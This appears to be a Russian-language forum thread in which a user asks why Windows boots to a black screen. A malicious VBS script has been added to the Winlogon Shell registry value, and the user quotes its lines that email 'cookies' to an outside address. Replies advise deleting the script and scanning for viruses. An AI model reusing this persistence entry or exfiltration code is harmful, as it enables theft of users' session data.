Евгений Крайнов

Не запускается explorer.exe при загрузке системы

В инете нашел инфу, что нужно проверить ветку реестра

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

у меня там стоит вот что

Explorer.exe c:\windows\system\svcl32.vbs

затем, открыл vbs-скрипт и понял, что там что-то отсылается на мыло

objEmail.From = "fuel@fuel.dn.ua"
objEmail.To = "arnh@bk.ru"
objEmail.Subject = "cookies"
objEmail.Textbody = "cookies"

вот. а суть маой проблемы в том, что при запуске системы, после экрана приветствия на долю секунды появляется cmd-окно, исчезает, а потом черный экран с мышью и все! Как это исправить? в реестре в этой ветке изменял свою строку на c:\windows\Explorer.exe не помогло (

Ольга Щербатых

убери c:\windows\system\svcl32.vbs, но сначала удали svcl32.vbs.И проверь userinit

Илья Балахнин

Вирус хапанул, сканируй Kaspersky Virus Removal Tool 2012-Бесплатная программа для полной проверки компьютера и удаления вирусов.

Жан Любимов

куки отсылает, удали этот svcl32 vbs